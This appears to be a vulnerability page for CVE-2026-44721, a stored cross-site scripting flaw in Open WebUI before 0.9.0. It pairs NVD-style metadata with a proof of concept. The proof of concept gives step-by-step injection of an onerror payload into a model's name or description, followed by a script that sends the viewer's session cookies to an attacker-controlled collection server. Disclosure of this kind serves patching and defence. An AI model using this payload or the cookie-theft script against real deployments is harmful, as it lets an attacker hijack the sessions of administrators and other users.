CVE-2026-44721

<!-- PoC for CVE-2026-44721 1. Login to Open WebUI with model creation permissions. 2. Create a new model. 3. Inject the following payload into the model name or description field: <img src=x onerror=alert(document.cookie)> 4. Save the model. 5. Have an admin or another user view the model in the chat interface. 6. The alert box will trigger, demonstrating XSS execution. --> <script> // Example payload to steal session cookies var img = new Image(); img.src = "http://attacker-controlled-server.com/collect?c=" + document.cookie; document.body.appendChild(img); </script>

{"cve": {"id": "CVE-2026-44721", "sourceIdentifier": "[email protected]", "published": "2026-05-15T21:16:36.370", "lastModified": "2026-05-15T21:16:36.370", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, a stored cross-site scripting (XSS) vulnerability that allows any authenticated user with model creation permission (workspace.models) to execute arbitrary JavaScript in the browser of any other user (including admins) who views the malicious model in the chat UI. This vulnerability is fixed in 0.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-gf5m-wcrh-7928", "source": "[email protected]"}]}}